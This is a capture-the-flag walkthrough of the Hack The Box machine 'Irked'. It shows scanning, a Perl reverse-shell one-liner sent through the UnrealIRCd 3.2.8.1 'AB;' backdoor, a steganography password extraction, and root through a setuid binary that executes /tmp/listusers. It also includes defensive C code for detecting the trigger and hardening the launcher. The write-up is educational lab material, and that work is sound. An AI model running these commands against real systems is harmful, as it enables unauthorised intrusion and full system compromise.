Irked

From Luniwiki

Irked01.png

Port scan

u505@kali:~/HTB/Machines/Irked$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.117 --rate=1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-02-14 19:56:36 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 33523/tcp on 10.10.10.117
Discovered open port 111/tcp on 10.10.10.117
Discovered open port 6697/tcp on 10.10.10.117
Discovered open port 65534/tcp on 10.10.10.117
Discovered open port 80/tcp on 10.10.10.117
Discovered open port 22/tcp on 10.10.10.117
Discovered open port 8067/tcp on 10.10.10.117
u505@kali:~/HTB/Machines/Irked$ nmap -sC -sV 10.10.10.117
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-14 14:56 EST
Nmap scan report for irked.htb (10.10.10.117)
Host is up (0.039s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33523/tcp   status
|   100024  1          33735/udp   status
|   100024  1          35313/tcp6  status
|_  100024  1          41089/udp6  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.77 seconds

We run a new nmap scan against all the ports found by masscan.

u505@kali:~/HTB/Machines/Irked$ nmap -sC -sV -p 22,80,111,6697,8067,50675,65534 10.10.10.117
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-14 14:59 EST
Nmap scan report for irked.htb (10.10.10.117)
Host is up (0.039s latency).

PORT      STATE  SERVICE VERSION
22/tcp    open   ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open   http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open   rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33523/tcp   status
|   100024  1          33735/udp   status
|   100024  1          35313/tcp6  status
|_  100024  1          41089/udp6  status
6697/tcp  open   irc     UnrealIRCd
8067/tcp  open   irc     UnrealIRCd
50675/tcp closed unknown
65534/tcp open   irc     UnrealIRCd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.06 seconds

Web enumeration

Irked02.png

The page has a smiley.

u505@kali:~/HTB/Machines/Irked$ curl http://irked
<img src=irked.jpg>
 <br>
 <b><center>IRC is almost working!</b></center>
u505@kali:~/HTB/Machines/Irked$ wget -q http://irked/irked.jpg

Directory brute-forcing of the web server doesn't give us any hint.

u505@kali:~/HTB/Machines/Irked$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt" -f -t 50 -u http://10.10.10.117 --plain-text-report=dirsearch.txt

  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )
Extensions: txt | HTTP method: get | Threads: 50 | Wordlist size: 9221
Error Log: /opt/utils/dirsearch/logs/errors-20-02-14_15-07-55.log
Target: http://10.10.10.117
[15:07:55] Starting:
[15:07:56] 403 - 300B - /.htpasswd.txt
[15:08:07] 403 - 293B - /icons/
[15:08:10] 200 - 626B - /manual/
[15:08:17] 403 - 301B - /server-status/
Task Completed

Port 6697

On port 6697 there is an IRC server.

u505@kali:~/HTB/Machines/Irked$ irssi
/connect 10.10.10.117 6697
  Irssi v1.2.2-1+b1 - https://irssi.org
15:12 -!-  ___           _
15:12 -!- |_ _|_ _ _____(_)
15:12 -!-  | || '_(_-<_-< |
15:12 -!- |___|_| /__/__/_|
15:12 -!- Irssi v1.2.2-1+b1 - https://irssi.org
15:13 -!- Irssi: Looking up 10.10.10.117
15:13 -!- Irssi: Connecting to 10.10.10.117 [10.10.10.117] port 6697
15:13 -!- Irssi: Connection to 10.10.10.117 established
15:13 !irked.htb *** Looking up your hostname...
15:13 !irked.htb *** Couldn't resolve your hostname; using your IP address instead
15:13 -!- You have not registered
15:13 -!- Welcome to the ROXnet IRC Network u505!u505@10.10.14.26
15:13 -!- Your host is irked.htb, running version Unreal3.2.8.1
15:13 -!- This server was created Mon May 14 2018 at 13:12:50 EDT
15:13 -!- irked.htb Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
15:13 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307
          MAXTARGETS=20 are supported by this server
15:13 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet
          CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ are supported by this server
15:13 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
15:13 -!- There are 1 users and 0 invisible on 1 servers
15:13 -!- 1 unknown connection(s)
15:13 -!- I have 1 clients and 0 servers
15:13 -!- Current Local Users: 1  Max: 1
15:13 -!- Current Global Users: 1  Max: 1
15:13 -!- MOTD File is missing
15:13 -!- Mode change [+iwx] for user u505
/quit

The server announces itself as Unreal 3.2.8.1.

u505@kali:~/HTB/Machines/Irked$ searchsploit Unreal 3.2.8.1
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                      |  Path
                                                                                                                    | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                                                        | exploits/linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                                                             | exploits/windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                                                      | exploits/linux/remote/13853.pl
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

Taking a look at the Metasploit module, we see that the backdoor executes whatever follows the characters AB; sent to the IRC port.
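A defender-side check for the trigger just described, added here as an example (it is not the page's code, nor part of UnrealIRCd or Metasploit): it classifies each raw line a sensor captured in front of the IRC port, treating a line that begins with the bytes AB; as the 3.2.8.1 backdoor trigger and everything else as either a normal IRC command token or something malformed. The sample lines are constructed; the comparison is case sensitive because the trojaned build compared raw bytes at the start of its read buffer.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Classification of one raw line as received by an IRC server. */
enum irc_line_kind { IRC_NORMAL, IRC_BACKDOOR_TRIGGER, IRC_MALFORMED };

/* Classify a line; the (uppercased) command token is copied into cmd. */
enum irc_line_kind classify_irc_line(const char *line, char *cmd, size_t cmdlen)
{
    const char *p = line;
    size_t n;
    int alpha = 1, digit = 1;

    /* The trojaned 3.2.8.1 build inspected the start of the raw read buffer:
     * a line beginning "AB;" is the trigger, before any IRC parsing happens. */
    if (strncmp(p, "AB;", 3) == 0) {
        snprintf(cmd, cmdlen, "AB;");
        return IRC_BACKDOOR_TRIGGER;
    }
    /* Skip an optional ":prefix " (servers send these; clients normally do not). */
    if (*p == ':') {
        while (*p && *p != ' ') p++;
        while (*p == ' ') p++;
    }
    /* A legitimate command token is letters only, or a three-digit numeric reply. */
    for (n = 0; p[n] && p[n] != ' ' && p[n] != '\r' && p[n] != '\n'; n++) {
        if (!isalpha((unsigned char)p[n])) alpha = 0;
        if (!isdigit((unsigned char)p[n])) digit = 0;
    }
    if (n == 0 || n >= cmdlen) return IRC_MALFORMED;
    for (size_t i = 0; i < n; i++) cmd[i] = (char)toupper((unsigned char)p[i]);
    cmd[n] = '\0';
    return (alpha || (digit && n == 3)) ? IRC_NORMAL : IRC_MALFORMED;
}

/* Convenience wrapper: 1 if the line is the backdoor trigger, else 0. */
int is_backdoor_trigger(const char *line)
{
    char cmd[64];
    return classify_irc_line(line, cmd, sizeof cmd) == IRC_BACKDOOR_TRIGGER;
}

/* Scan captured lines; returns how many triggers were seen. */
int count_backdoor_triggers(const char *const *lines, int nlines)
{
    int hits = 0;
    for (int i = 0; i < nlines; i++)
        hits += is_backdoor_trigger(lines[i]);
    return hits;
}

/* Constructed sample of what a sensor in front of port 6697 might capture. */
const char *const SAMPLE_LINES[] = {
    "NICK u505",
    "USER u505 0 * :u505",
    "AB; whoami",
    ":u505!u505@10.10.14.26 PRIVMSG #chan :hello",
    "ab; lowercase is not the trigger",
    "AB; id",
};
const int SAMPLE_COUNT = (int)(sizeof SAMPLE_LINES / sizeof SAMPLE_LINES[0]);

int main(void)
{
    char cmd[64];
    for (int i = 0; i < SAMPLE_COUNT; i++) {
        enum irc_line_kind k = classify_irc_line(SAMPLE_LINES[i], cmd, sizeof cmd);
        printf("%-6s %s\n", k == IRC_BACKDOOR_TRIGGER ? "ALERT" :
                            k == IRC_NORMAL ? "ok" : "odd", SAMPLE_LINES[i]);
    }
    printf("backdoor triggers seen: %d\n",
           count_backdoor_triggers(SAMPLE_LINES, SAMPLE_COUNT));
    return 0;
}
```

Fed the sample above, the scanner reports two triggers; the lowercase line and the prefixed PRIVMSG are not flagged. In practice the same classification would run over a pcap or an IRC proxy log, and a single trigger hit is enough to justify taking the host offline, since the only reason such a line reaches the server is that someone knows about the backdoor.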

Exploit IRC backdoor

Start a listener

u505@kali:~/HTB/Machines/Irked$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Trigger the backdoor

u505@kali:~/HTB/Machines/Irked$ telnet 10.10.10.117 6697
Trying 10.10.10.117...
Connected to 10.10.10.117.
Escape character is '^]'.
:irked.htb NOTICE AUTH :*** Looking up your hostname...
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
AB; perl -e 'use Socket;$i="10.10.14.26";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

And the listener receives the reverse shell.

u505@kali:~/HTB/Machines/Irked$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.117.
Ncat: Connection from 10.10.10.117:36220.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
ircd
$ python -c 'import pty; pty.spawn("/bin/bash")'
ircd@irked:~/Unreal3.2$ stty raw -echo
stty raw -echo

User flag

ircd@irked:~$ cat .bash_history
...
ls -lah
cd ..
ls
cd djmardov
ls
cd Documents
ls -lah
cat .backup
clear
exit

We take a look at the Documents folder.

ircd@irked:~$ cd /home/djmardov/Documents
ircd@irked:/home/djmardov/Documents$ ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3  2018 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

We cannot read the flag, but the hidden file .backup is readable.

ircd@irked:/home/djmardov/Documents$ cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

Because of the word steg, I guess the password protects some information hidden by steganography, and I guess the carrier image is the irked.jpg file on the web server.

u505@kali:~/HTB/Machines/Irked$ steghide info  irked.jpg
"irked.jpg":
 format: jpeg
 capacity: 1.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
 embedded file "pass.txt":
   size: 17.0 Byte
   encrypted: rijndael-128, cbc
   compressed: yes
u505@kali:~/HTB/Machines/Irked$ steghide extract -sf irked.jpg
Enter passphrase:
wrote extracted data to "pass.txt".
u505@kali:~/HTB/Machines/Irked$ cat pass.txt
Kab6h+m+bbp2J:HG

Now we can SSH into the box with the extracted password.

u505@kali:~/HTB/Machines/Irked$ ssh djmardov@irked
The authenticity of host 'irked (10.10.10.117)' can't be established.
ECDSA key fingerprint is SHA256:kunqU6QEf9TV3pbsZKznVcntLklRwiVobFZiJguYs4g.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'irked,10.10.10.117' (ECDSA) to the list of known hosts.
djmardov@irked's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ cat Documents/user.txt
<USER_FLAG>

Enumeration

u505@kali:~/HTB/Machines/Irked/www$ cp /opt/utils/LinEnum/LinEnum.sh ./
u505@kali:~/HTB/Machines/Irked/www$ cp /opt/utils/pspy/pspy32 ./
u505@kali:~/HTB/Machines/Irked/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...

From the target we download the files.

djmardov@irked:~$ wget -q http://10.10.14.26/LinEnum.sh
djmardov@irked:~$ wget -q http://10.10.14.26/pspy32
djmardov@irked:~$ chmod +x LinEnum.sh pspy32

During the enumeration an unusual SUID file appears: /usr/bin/viewuser.

[-] SUID files:
-rwsr-xr-- 1 root messagebus 362672 Nov 21  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9468 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 13816 Sep  8  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 562536 Nov 19  2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 13564 Oct 14  2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root root 1085300 Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 338948 Apr 14  2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 43576 May 17  2017 /usr/bin/chsh
-rwsr-sr-x 1 root mail 96192 Nov 18  2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 78072 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17  2017 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 50644 Sep 30  2014 /usr/bin/at
-rwsr-xr-x 1 root root 18072 Sep  8  2016 /usr/bin/pkexec
-rwsr-sr-x 1 root root 9468 Apr  1  2014 /usr/bin/X
-rwsr-xr-x 1 root root 53112 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 52344 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 7328 May 16  2018 /usr/bin/viewuser
-rwsr-xr-x 1 root root 96760 Aug 13  2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 38868 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 34684 Mar 29  2015 /bin/mount
-rwsr-xr-x 1 root root 34208 Jan 21  2016 /bin/fusermount
-rwsr-xr-x 1 root root 161584 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26344 Mar 29  2015 /bin/umount

viewuser file

Executing the file gives this result.

djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-02-14 15:44 (:0)
djmardov pts/0        2020-02-14 15:45 (10.10.14.26)
djmardov pts/1        2020-02-14 15:50 (10.10.14.26)
sh: 1: /tmp/listusers: not found

pspy captures the following.

2020/02/14 15:55:08 CMD: UID=1000 PID=1961   | -bash
2020/02/14 15:55:08 CMD: UID=1000 PID=1962   | sh -c who
2020/02/14 15:55:08 CMD: UID=1000 PID=1963   | sh -c who
2020/02/14 15:55:08 CMD: UID=1000 PID=1964   | /usr/bin/viewuser
2020/02/14 15:55:08 CMD: UID=1000 PID=1965   | sh -c /tmp/listusers

I try to write something into the missing file.

djmardov@irked:~$ echo "whoami" > /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-02-14 15:44 (:0)
djmardov pts/0        2020-02-14 15:45 (10.10.14.26)
djmardov pts/1        2020-02-14 15:50 (10.10.14.26)
sh: 1: /tmp/listusers: Permission denied

We make the file executable.

djmardov@irked:~$ chmod +x /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-02-14 15:44 (:0)
djmardov pts/0        2020-02-14 15:45 (10.10.14.26)
djmardov pts/1        2020-02-14 15:50 (10.10.14.26)
root

We are root! Instead of whoami, we launch a new bash shell.

djmardov@irked:~$ echo "bash" > /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-02-14 15:44 (:0)
djmardov pts/0        2020-02-14 15:45 (10.10.14.26)
djmardov pts/1        2020-02-14 15:50 (10.10.14.26)
root@irked:~# whoami
root

Instead of trial and error, a more rigorous and quieter method would be to transfer the binary and decompile it.

Irked03.png

Now it is clear that the program does a setuid and then executes the file /tmp/listusers.
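The pattern the decompiled binary shows, beside a hardened form, as an added example (reconstructed from the page's description of viewuser, not from its actual source, and not code from the box): a setuid-root launcher that hands a path in a world-writable directory to the shell lets any local user choose what runs as root. The hardened version refuses helpers that are missing, not regular files, not root-owned, writable by group or others, or located under /tmp, and uses execv instead of a shell. The path /usr/lib/viewuser/listusers is a hypothetical example location.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* The weakness as the page describes it: become root, then hand a fixed path in
 * a world-writable directory to the shell.  Whoever can write /tmp/listusers
 * picks the command.  Never called here; kept only for comparison. */
void viewuser_vulnerable_pattern(void)
{
    setuid(0);
    system("/tmp/listusers");
}

/* Pure check on ownership and mode: a helper run with root privilege must be
 * root-owned, executable, and writable by nobody except root. */
int helper_mode_is_safe(uid_t owner, mode_t mode)
{
    if (owner != 0) return 0;
    if (mode & (S_IWGRP | S_IWOTH)) return 0;
    if (!(mode & S_IXUSR)) return 0;
    return 1;
}

/* Path policy: absolute, no traversal, and never under /tmp. */
int helper_path_is_allowed(const char *path)
{
    if (path == NULL || path[0] != '/') return 0;
    if (strncmp(path, "/tmp/", 5) == 0) return 0;
    if (strstr(path, "/../") != NULL) return 0;
    return 1;
}

/* Returns 0 when the helper passes every check, else a reason code:
 * 1 bad path, 2 missing, 3 not a regular file (e.g. a symlink), 4 bad owner/mode. */
int check_helper(const char *path)
{
    struct stat st;
    if (!helper_path_is_allowed(path)) return 1;
    if (lstat(path, &st) != 0) return 2;
    if (!S_ISREG(st.st_mode)) return 3;
    if (!helper_mode_is_safe(st.st_uid, st.st_mode)) return 4;
    return 0;
}

/* Hardened launcher: vet first, then execv directly (no shell, no PATH lookup).
 * Returns the helper's exit status, or the reason code if it was refused. */
int run_helper(const char *path)
{
    int rc = check_helper(path);
    if (rc != 0) {
        fprintf(stderr, "refusing to run %s (reason %d)\n", path, rc);
        return rc;
    }
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)path, NULL };
        execv(path, argv);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Show the verdict for the page's path and two alternatives; nothing is executed. */
    const char *candidates[] = { "/tmp/listusers", "/usr/lib/viewuser/listusers", "/bin/true" };
    for (size_t i = 0; i < sizeof candidates / sizeof candidates[0]; i++)
        printf("%-30s -> %d\n", candidates[i], check_helper(candidates[i]));
    return 0;
}
```

The check is still a stat-then-exec sequence, so it only holds if the helper's directory is itself root-owned and not world-writable (which the /tmp rule is the crude version of); a stricter launcher would open the file, fstat the descriptor it got, and run it with fexecve so the vetted object and the executed object cannot differ. For detection, the pspy trace above is the signature to look for on a live host: a root-privileged process spawning sh -c on a path under /tmp.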

Root Flag

root@irked:~# cat /root/root.txt
<ROOT_FLAG>

References

Daniel Simao 18:54, 14 February 2020 (EST)